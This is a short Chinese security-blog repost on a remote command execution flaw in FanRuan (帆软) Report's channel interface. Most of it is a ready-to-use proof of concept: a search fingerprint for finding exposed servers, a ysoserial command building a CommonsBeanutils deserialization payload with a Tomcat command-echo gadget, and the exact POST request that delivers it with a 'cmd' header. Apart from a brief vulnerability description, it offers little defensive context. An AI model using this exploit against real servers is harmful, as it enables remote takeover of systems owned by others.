帆软报表 channel 远程命令执行漏洞
2024-1-22 12:10:3 Author: Ots安全(查看原文) 阅读量:372 收藏

漏洞描述

帆软报表 channel 接口存在远程命令执行漏洞, 攻击者通过漏洞可以获取服务器权限,攻击服务器

漏洞影响

帆软报表

网络测绘

"Powered by 帆软"

漏洞复现

登陆页面

验证POC

java -jar ysoserial-1.5-su18-all.jar -g CommonsBeanutils1183NOCC -p 'EX-TomcatEcho' -ch "cmd" > fine10.bin
POST /webroot/decision/remote/design/channel HTTP/1.1Content-Type: application/jsonHost: cmd: idConnection: close
{{gzip(file(fine10.bin))}}

感谢您抽出

.

.

来阅读本文

点它,分享点赞在看都在这里


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247503760&idx=2&sn=91e2cf4ee6b8f278fd9a51711a84cbc2&chksm=9a68bb90c5bba679e61904e923ba738ef3cb8e39ccbae30b71b45aef12495f715b51a29f4f42&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh